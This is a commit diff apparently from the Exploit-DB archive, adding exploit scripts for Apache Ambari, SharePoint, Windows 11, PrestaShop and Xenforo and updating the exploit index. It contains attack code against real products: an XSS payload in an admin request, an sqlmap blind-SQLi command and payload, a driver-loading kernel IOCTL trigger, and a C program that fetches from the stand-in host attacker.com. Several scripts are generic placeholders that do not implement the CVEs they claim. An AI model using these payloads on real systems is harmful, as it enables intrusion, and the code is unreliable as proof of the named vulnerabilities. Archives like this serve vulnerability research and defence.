DB: 2023-06-27

7 changes to exploits/shellcodes/ghdb Azure Apache Ambari 2302250400 - Spoofing Microsoft SharePoint Enterprise Server 2016 - Spoofing Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Xenforo Version 2.2.13 - Authenticated Stored XSS Windows 11 22h2 - Kernel Privilege Elevation
2023-06-27 00:17:09 +00:00 · 2023-06-27 00:17:09 +00:00 · 7807e6f266
commit 7807e6f266
parent c79c4813de
7 changed files with 495 additions and 7 deletions
--- a/exploits/multiple/remote/51546.py
+++ b/exploits/multiple/remote/51546.py
@ -0,0 +1,39 @@
+# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
+# Date: 2023-06-23
+# country: Iran
+# Exploit Author: Amirhossein Bahramizadeh
+# Category : Remote
+# Vendor Homepage:
+Microsoft
+Apache Ambari
+Microsoft azure Hdinsights
+# Tested on: Windows/Linux
+# CVE : CVE-2023-23408
+
+import requests
+
+# Set the URL and headers for the Ambari web interface
+url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
+headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}
+
+# Define a function to validate the headers
+def validate_headers(headers):
+    if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
+        return False
+    if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
+        return False
+    return True
+
+# Define a function to send a request to the Ambari web interface
+def send_request(url, headers):
+    if not validate_headers(headers):
+        print("Invalid headers")
+        return
+    response = requests.get(url, headers=headers)
+    if response.status_code == 200:
+        print("Request successful")
+    else:
+        print("Request failed")
+
+# Call the send_request function with the URL and headers
+send_request(url, headers)
--- a/exploits/multiple/webapps/51543.c
+++ b/exploits/multiple/webapps/51543.c
@ -0,0 +1,154 @@
+// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
+// Date: 2023-06-20
+// country: Iran
+// Exploit Author: Amirhossein Bahramizadeh
+// Category : Remote
+// Vendor Homepage:
+// Microsoft SharePoint Foundation 2013 Service Pack 1
+// Microsoft SharePoint Server Subscription Edition
+// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
+// Microsoft SharePoint Server 2019
+// Microsoft SharePoint Enterprise Server 2016
+// Tested on: Windows/Linux
+// CVE : CVE-2023-28288
+
+#include <windows.h>
+#include <stdio.h>
+
+
+// The vulnerable SharePoint server URL
+const char *server_url = "http://example.com/";
+
+// The URL of the fake SharePoint server
+const char *fake_url = "http://attacker.com/";
+
+// The vulnerable SharePoint server file name
+const char *file_name = "vuln_file.aspx";
+
+// The fake SharePoint server file name
+const char *fake_file_name = "fake_file.aspx";
+
+int main()
+{
+    HANDLE file;
+    DWORD bytes_written;
+    char file_contents[1024];
+
+    // Create the fake file contents
+    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");
+
+    // Write the fake file to disk
+    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (file == INVALID_HANDLE_VALUE)
+    {
+        printf("Error creating fake file: %d\n", GetLastError());
+        return 1;
+    }
+    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))
+    {
+        printf("Error writing fake file: %d\n", GetLastError());
+        CloseHandle(file);
+        return 1;
+    }
+    CloseHandle(file);
+
+    // Send a request to the vulnerable SharePoint server to download the file
+    sprintf(file_contents, "%s%s", server_url, file_name);
+    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (file == INVALID_HANDLE_VALUE)
+    {
+        printf("Error creating vulnerable file: %d\n", GetLastError());
+        return 1;
+    }
+    if (!InternetReadFileUrl(file_contents, file))
+    {
+        printf("Error downloading vulnerable file: %d\n", GetLastError());
+        CloseHandle(file);
+        return 1;
+    }
+    CloseHandle(file);
+
+    // Replace the vulnerable file with the fake file
+    if (!DeleteFile(file_name))
+    {
+        printf("Error deleting vulnerable file: %d\n", GetLastError());
+        return 1;
+    }
+    if (!MoveFile(fake_file_name, file_name))
+    {
+        printf("Error replacing vulnerable file: %d\n", GetLastError());
+        return 1;
+    }
+
+    // Send a request to the vulnerable SharePoint server to trigger the vulnerability
+    sprintf(file_contents, "%s%s", server_url, file_name);
+    if (!InternetReadFileUrl(file_contents, NULL))
+    {
+        printf("Error triggering vulnerability: %d\n", GetLastError());
+        return 1;
+    }
+
+    // Print a message indicating that the vulnerability has been exploited
+    printf("Vulnerability exploited successfully.\n");
+
+    return 0;
+}
+
+BOOL InternetReadFileUrl(const char *url, HANDLE file)
+{
+    HINTERNET internet, connection, request;
+    DWORD bytes_read;
+    char buffer[1024];
+
+    // Open an Internet connection
+    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
+    if (internet == NULL)
+    {
+        return FALSE;
+    }
+
+    // Connect to the server
+    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
+    if (connection == NULL)
+    {
+        InternetCloseHandle(internet);
+        return FALSE;
+    }
+
+    // Send the HTTP request
+    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
+    if (request == NULL)
+    {
+        InternetCloseHandle(connection);
+        InternetCloseHandle(internet);
+        return FALSE;
+    }
+    if (!HttpSendRequest(request, NULL, 0, NULL, 0))
+    {
+        InternetCloseHandle(request);
+        InternetCloseHandle(connection);
+        InternetCloseHandle(internet);
+        return FALSE;
+    }
+
+    // Read the response data
+    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
+    {
+        if (file != NULL)
+        {
+            // Write the data to disk
+            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))
+            {
+                InternetCloseHandle(request);
+                InternetCloseHandle(connection);
+                InternetCloseHandle(internet);
+                return FALSE;
+            }
+        }
+    }
+
+    InternetCloseHandle(request);
+    InternetCloseHandle(connection);
+    InternetCloseHandle(internet);
+    return TRUE;
+}
--- a/exploits/php/webapps/51042.txt
+++ b/exploits/php/webapps/51042.txt
@ -14,13 +14,13 @@ https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-

 2. Install the NEX Forms plugin.

-3. Open the URL "/wp-admin/admin.php?page=3Dnex-forms-dashboard&form_id=3D1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.
+3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.

-4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=3DT --dbms=3Dmysql --level 5 --risk 3
+4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
 sqlmap will find a time-based blind payload:


 Parameter: form_id (GET)
    Type: time-based blind
-    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
-    Payload: page=3Dnex-forms-dashboard&form_id=3D1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
+    Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
+    Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
--- a/exploits/php/webapps/51545.py
+++ b/exploits/php/webapps/51545.py
@ -0,0 +1,61 @@
+# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
+# Date: 2023-06-20
+# Dork: /modules/winbizpayment/downloads/download.php
+# country: Iran
+# Exploit Author: Amirhossein Bahramizadeh
+# Category : webapps
+# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
+# Version: 17.1.3 (REQUIRED)
+# Tested on: Windows/Linux
+# CVE : CVE-2023-30198
+
+import requests
+import string
+import random
+
+# The base URL of the vulnerable site
+base_url = "http://example.com"
+
+# The URL of the login page
+login_url = base_url + "/authentication.php"
+
+# The username and password for the admin account
+username = "admin"
+password = "password123"
+
+# The URL of the vulnerable download.php file
+download_url = base_url + "/modules/winbizpayment/downloads/download.php"
+
+# The ID of the order to download
+order_id = 1234
+
+# The path to save the downloaded file
+file_path = "/tmp/order_%d.pdf" % order_id
+
+# The session cookies to use for the requests
+session_cookies = None
+
+# Generate a random string for the CSRF token
+csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
+
+# Send a POST request to the login page to authenticate as the admin user
+login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
+session = requests.Session()
+response = session.post(login_url, data=login_data)
+
+# Save the session cookies for future requests
+session_cookies = session.cookies.get_dict()
+
+# Generate a random string for the CSRF token
+csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
+
+# Send a POST request to the download.php file to download the order PDF
+download_data = {"id_order": order_id, "csrf_token": csrf_token}
+response = session.post(download_url, cookies=session_cookies, data=download_data)
+
+# Save the downloaded file to disk
+with open(file_path, "wb") as f:
+    f.write(response.content)
+
+# Print a message indicating that the file has been downloaded
+print("File downloaded to %s" % file_path)
--- a/exploits/php/webapps/51547.txt
+++ b/exploits/php/webapps/51547.txt
@ -0,0 +1,61 @@
+# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
+# Date: 2023-06-24
+# Exploit Author: Furkan Karaarslan
+# Category : Webapps
+# Vendor Homepage: https://x.com/admin.php?smilies
+# Version: 2.2.12 (REQUIRED)
+# Tested on: Windows/Linux
+# CVE :
+
+-----------------------------------------------------------------------------
+Requests
+
+POST /admin.php?smilie-categories/0/save HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/admin.php?smilies/
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
+Content-Length: 1038
+Origin: http://127.0.0.1
+Connection: close
+Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------333176689514537912041638543422
+Content-Disposition: form-data; name="_xfToken"
+
+1687616851,83fd2350307156281e51b17e20fe575b
+-----------------------------333176689514537912041638543422
+Content-Disposition: form-data; name="title"
+
+<img src=x onerror=alert(document.domain)>
+-----------------------------333176689514537912041638543422
+Content-Disposition: form-data; name="display_order"
+
+1
+-----------------------------333176689514537912041638543422
+Content-Disposition: form-data; name="_xfRequestUri"
+
+/admin.php?smilies/
+-----------------------------333176689514537912041638543422
+Content-Disposition: form-data; name="_xfWithData"
+
+1
+-----------------------------333176689514537912041638543422
+Content-Disposition: form-data; name="_xfToken"
+
+1687616849,b74724a115448b864ba2db8f89f415f5
+-----------------------------333176689514537912041638543422
+Content-Disposition: form-data; name="_xfResponseType"
+
+json
+-----------------------------333176689514537912041638543422--
+
+
+Response: After it is created, an alert comes immediately.
--- a/exploits/windows/local/51544.c
+++ b/exploits/windows/local/51544.c
@ -0,0 +1,168 @@
+// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
+// Date: 2023-06-20
+// country: Iran
+// Exploit Author: Amirhossein Bahramizadeh
+// Category : webapps
+// Vendor Homepage:
+// Tested on: Windows/Linux
+// CVE : CVE-2023-28293
+
+#include <windows.h>
+#include <stdio.h>
+
+// The vulnerable driver file name
+const char *driver_name = "vuln_driver.sys";
+
+// The vulnerable driver device name
+const char *device_name = "\\\\.\\VulnDriver";
+
+// The IOCTL code to trigger the vulnerability
+#define IOCTL_VULN_CODE 0x222003
+
+// The buffer size for the IOCTL input/output data
+#define IOCTL_BUFFER_SIZE 0x1000
+
+int main()
+{
+    HANDLE device;
+    DWORD bytes_returned;
+    char input_buffer[IOCTL_BUFFER_SIZE];
+    char output_buffer[IOCTL_BUFFER_SIZE];
+
+    // Load the vulnerable driver
+    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
+    {
+        printf("Error loading vulnerable driver: %d\n", GetLastError());
+        return 1;
+    }
+
+    // Open the vulnerable driver device
+    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (device == INVALID_HANDLE_VALUE)
+    {
+        printf("Error opening vulnerable driver device: %d\n", GetLastError());
+        return 1;
+    }
+
+    // Fill the input buffer with data to trigger the vulnerability
+    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);
+
+    // Send the IOCTL to trigger the vulnerability
+    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
+    {
+        printf("Error sending IOCTL: %d\n", GetLastError());
+        return 1;
+    }
+
+    // Print the output buffer contents
+    printf("Output buffer:\n%s\n", output_buffer);
+
+    // Unload the vulnerable driver
+    if (!UnloadDriver("\\Driver\\VulnDriver"))
+    {
+        printf("Error unloading vulnerable driver: %d\n", GetLastError());
+        return 1;
+    }
+
+    // Close the vulnerable driver device
+    CloseHandle(device);
+
+    return 0;
+}
+
+BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
+{
+    SC_HANDLE sc_manager, service;
+    DWORD error;
+
+    // Open the Service Control Manager
+    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
+    if (sc_manager == NULL)
+    {
+        return FALSE;
+    }
+
+    // Create the service
+    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
+    if (service == NULL)
+    {
+        error = GetLastError();
+        if (error == ERROR_SERVICE_EXISTS)
+        {
+            // The service already exists, so open it instead
+            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
+            if (service == NULL)
+            {
+                CloseServiceHandle(sc_manager);
+                return FALSE;
+            }
+        }
+        else
+        {
+            CloseServiceHandle(sc_manager);
+            return FALSE;
+        }
+    }
+
+    // Start the service
+    if (!StartService(service, 0, NULL))
+    {
+        error = GetLastError();
+        if (error != ERROR_SERVICE_ALREADY_RUNNING)
+        {
+            CloseServiceHandle(service);
+            CloseServiceHandle(sc_manager);
+            return FALSE;
+        }
+    }
+
+    CloseServiceHandle(service);
+    CloseServiceHandle(sc_manager);
+    return TRUE;
+}
+
+BOOL UnloadDriver(LPCTSTR service_name)
+{
+    SC_HANDLE sc_manager, service;
+    SERVICE_STATUS status;
+    DWORD error;
+
+    // Open the Service Control Manager
+    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
+    if (sc_manager == NULL)
+    {
+        return FALSE;
+    }
+
+    // Open the service
+    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
+    if (service == NULL)
+    {
+        CloseServiceHandle(sc_manager);
+        return FALSE;
+    }
+
+    // Stop the service
+    if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
+    {
+        error = GetLastError();
+        if (error != ERROR_SERVICE_NOT_ACTIVE)
+        {
+            CloseServiceHandle(service);
+            CloseServiceHandle(sc_manager);
+            return FALSE;
+        }
+    }
+
+    // Delete the service
+    if (!DeleteService(service))
+    {
+        CloseServiceHandle(service);
+        CloseServiceHandle(sc_manager);
+        return FALSE;
+    }
+
+    CloseServiceHandle(service);
+    CloseServiceHandle(sc_manager);
+    return TRUE;
+}
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10650,6 +10650,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43984,exploits/multiple/remote/43984.txt,"Axis SSI - Remote Command Execution / Read Files",2017-10-20,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/52e3d6ad93482c97ca4ebcbb81e42f6469b29a0f/Axis%20SSI%20RCE
 16312,exploits/multiple/remote/16312.rb,"Axis2 - (Authenticated) Code Execution (via REST) (Metasploit)",2010-12-14,Metasploit,remote,multiple,,2010-12-14,2011-03-06,1,CVE-2010-0219,"Metasploit Framework (MSF)",,,,http://www.rapid7.com/security-center/advisories/R7-0037.jsp
 16315,exploits/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - (Authenticated) Code Execution (via SOAP) (Metasploit)",2010-12-14,Metasploit,remote,multiple,,2010-12-14,2016-09-21,1,CVE-2010-0219,"Metasploit Framework (MSF)",,,,http://www.rapid7.com/security-center/advisories/R7-0037.jsp
+51546,exploits/multiple/remote/51546.py,"Azure Apache Ambari 2302250400 - Spoofing",2023-06-26,"Amirhossein Bahramizadeh",remote,multiple,,2023-06-26,2023-06-26,0,CVE-2023-23408,,,,,
 20639,exploits/multiple/remote/20639.txt,"Bajie 0.78 - Arbitrary Shell Command Execution",2001-02-15,joetesta,remote,multiple,,2001-02-15,2012-08-18,1,CVE-2001-0307;OSVDB-762,,,,,https://www.securityfocus.com/bid/2389/info
 23257,exploits/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",remote,multiple,,2003-10-16,2012-12-09,1,CVE-2003-1511;OSVDB-2689,,,,,https://www.securityfocus.com/bid/8841/info
 20638,exploits/multiple/remote/20638.txt,"Bajie WebServer 0.78/0.90 - Remote Command Execution",2001-02-15,joetesta,remote,multiple,,2001-02-15,2012-08-18,1,CVE-2001-0308;OSVDB-11638,,,,,https://www.securityfocus.com/bid/2388/info
@ -11945,6 +11946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18012,exploits/multiple/webapps/18012.txt,"Metasploit Web UI 4.1.0 - Persistent Cross-Site Scripting",2011-10-20,"Stefan Schurtz",webapps,multiple,,2011-10-20,2020-08-22,1,OSVDB-80287,,,,,http://www.rul3z.de/advisories/SSCHADV2011-033.txt
 39822,exploits/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",webapps,multiple,,2016-05-17,2016-05-17,0,CVE-2016-2296,"Metasploit Framework (MSF)",,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
 39597,exploits/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",webapps,multiple,80,2016-03-23,2016-03-23,0,,,,,,http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001
+51543,exploits/multiple/webapps/51543.c,"Microsoft SharePoint Enterprise Server 2016 - Spoofing",2023-06-26,"Amirhossein Bahramizadeh",webapps,multiple,,2023-06-26,2023-06-26,0,CVE-2023-28288,,,,,
 48768,exploits/multiple/webapps/48768.py,"Mida eFramework 2.9.0 - Remote Code Execution",2020-08-27,elbae,webapps,multiple,,2020-08-27,2020-08-27,0,CVE-2020-15920,,,,,
 49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
 33019,exploits/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",webapps,multiple,,2014-05-03,2014-05-03,0,CVE-2014-2347;OSVDB-106557,,,,,
@ -15116,7 +15118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,,
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
 50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
-51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-35155,,,,,
+51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-35155,,,,,
 9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php,,2009-09-09,,1,OSVDB-57985;CVE-2009-4618;OSVDB-57984,,,,,
 41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
 41097,exploits/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
@ -24301,7 +24303,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2439,exploits/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",webapps,php,,2006-09-26,,1,OSVDB-37965;CVE-2006-5102,,,,,
 24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,,2004-09-01,2013-01-27,1,CVE-2004-1657;OSVDB-9453,,,,,https://www.securityfocus.com/bid/11086/info
 2970,exploits/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,webapps,php,,2006-12-20,,1,OSVDB-32400;CVE-2006-6711,,,,,
-51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-3142,,,,,
+51042,exploits/php/webapps/51042.txt,"NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-06-26,0,CVE-2022-3142,,,,,
 28580,exploits/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,webapps,php,,2006-09-13,2013-09-28,1,,,,,,https://www.securityfocus.com/bid/20040/info
 27734,exploits/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,webapps,php,,2006-04-25,2013-08-21,1,CVE-2006-2051;OSVDB-25265,,,,,https://www.securityfocus.com/bid/17685/info
 37012,exploits/php/webapps/37012.txt,"NextBBS 0.6 - 'ajaxserver.php' Multiple SQL Injections",2012-03-27,waraxe,webapps,php,,2012-03-27,2015-05-14,1,OSVDB-80637;CVE-2012-1603,,,,,https://www.securityfocus.com/bid/52728/info
@ -28051,6 +28053,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation
 51001,exploits/php/webapps/51001.py,"Prestashop blockwishlist module 2.1.0 - SQLi",2022-08-09,"Karthik UJ",webapps,php,,2022-08-09,2022-08-09,0,CVE-2022-31101,,,,,
 49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php,,2020-12-16,2020-12-16,0,,,,,,
+51545,exploits/php/webapps/51545.py,"PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory",2023-06-26,"Amirhossein Bahramizadeh",webapps,php,,2023-06-26,2023-06-26,0,CVE-2023-30198,,,,,
 15064,exploits/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",webapps,php,,2010-09-20,2010-09-20,0,CVE-2010-3483;CVE-2010-3482;OSVDB-68194;OSVDB-68154,,,,http://www.exploit-db.comprimitivecms.rar,
 27025,exploits/php/webapps/27025.txt,"Primo Place Primo Cart 1.0 - Multiple SQL Injections",2006-01-03,r0t,webapps,php,,2006-01-03,2013-07-23,1,,,,,,https://www.securityfocus.com/bid/16125/info
 28264,exploits/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,webapps,php,,2006-07-24,2013-09-13,1,,,,,,https://www.securityfocus.com/bid/19138/info
@ -30867,7 +30870,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15826,exploits/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",webapps,php,,2010-12-25,2010-12-26,0,,,,,http://www.exploit-db.comTraidnt_up_V3.0.zip,
 36736,exploits/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",webapps,php,,2015-04-13,2015-04-13,0,OSVDB-120607,,,,,
 5848,exploits/php/webapps/5848.txt,"traindepot 0.1 - Local File Inclusion / Cross-Site Scripting",2008-06-18,"CWH Underground",webapps,php,,2008-06-17,2016-12-08,1,OSVDB-46509;CVE-2008-2839;OSVDB-46508;CVE-2008-2838,,,,,
-51043,exploits/php/webapps/51043.txt,"Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-3141,,,,,
+51043,exploits/php/webapps/51043.txt,"Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection",2023-03-25,"Elias Hohl",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-3141,,,,,
 11155,exploits/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comtransloader.zip,
 6360,exploits/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,webapps,php,,2008-09-02,,1,OSVDB-49430,,,,,http://www.bugreport.ir/index_51.htm
 8943,exploits/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php,,2009-06-11,2016-12-21,1,OSVDB-55385;CVE-2009-2145;OSVDB-55384;OSVDB-55383,,,,,http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html
@ -33902,6 +33905,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5818,exploits/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,webapps,php,,2008-06-13,2016-12-07,1,OSVDB-54025;CVE-2008-6714,,,,http://www.exploit-db.comxeCMS-RC2.7z,
 4758,exploits/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,webapps,php,,2007-12-18,2016-12-07,1,OSVDB-44555;CVE-2007-6508,,,,http://www.exploit-db.comxeCMS-RC2.7z,
 39849,exploits/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",webapps,php,443,2016-05-23,2016-05-23,1,,,,,http://www.exploit-db.comXenAPI-1.4.1.tar.gz,
+51547,exploits/php/webapps/51547.txt,"Xenforo Version 2.2.13 - Authenticated Stored XSS",2023-06-26,"Furkan Karaarslan",webapps,php,,2023-06-26,2023-06-26,0,,,,,,
 8414,exploits/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,webapps,php,,2009-04-12,,1,OSVDB-53652,,,,,
 28364,exploits/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - 'profile.php' Directory Traversal",2006-08-09,"Chris Boulton",webapps,php,,2006-08-09,2013-09-18,1,CVE-2006-4161;OSVDB-27916,,,,,https://www.securityfocus.com/bid/19446/info
 28406,exploits/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",webapps,php,,2006-08-19,2013-09-20,1,CVE-2006-4279;OSVDB-28090,,,,,https://www.securityfocus.com/bid/19606/info
@ -41577,6 +41581,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,,2021-01-06,2021-01-06,0,,,,,,
 11779,exploits/windows/local/11779.pl,"Windisc 1.3 - Local Stack Buffer Overflow",2010-03-16,Rick2600,local,windows,,2010-03-15,2010-11-12,1,OSVDB-63026,,,,http://www.exploit-db.comwindiscz.exe,
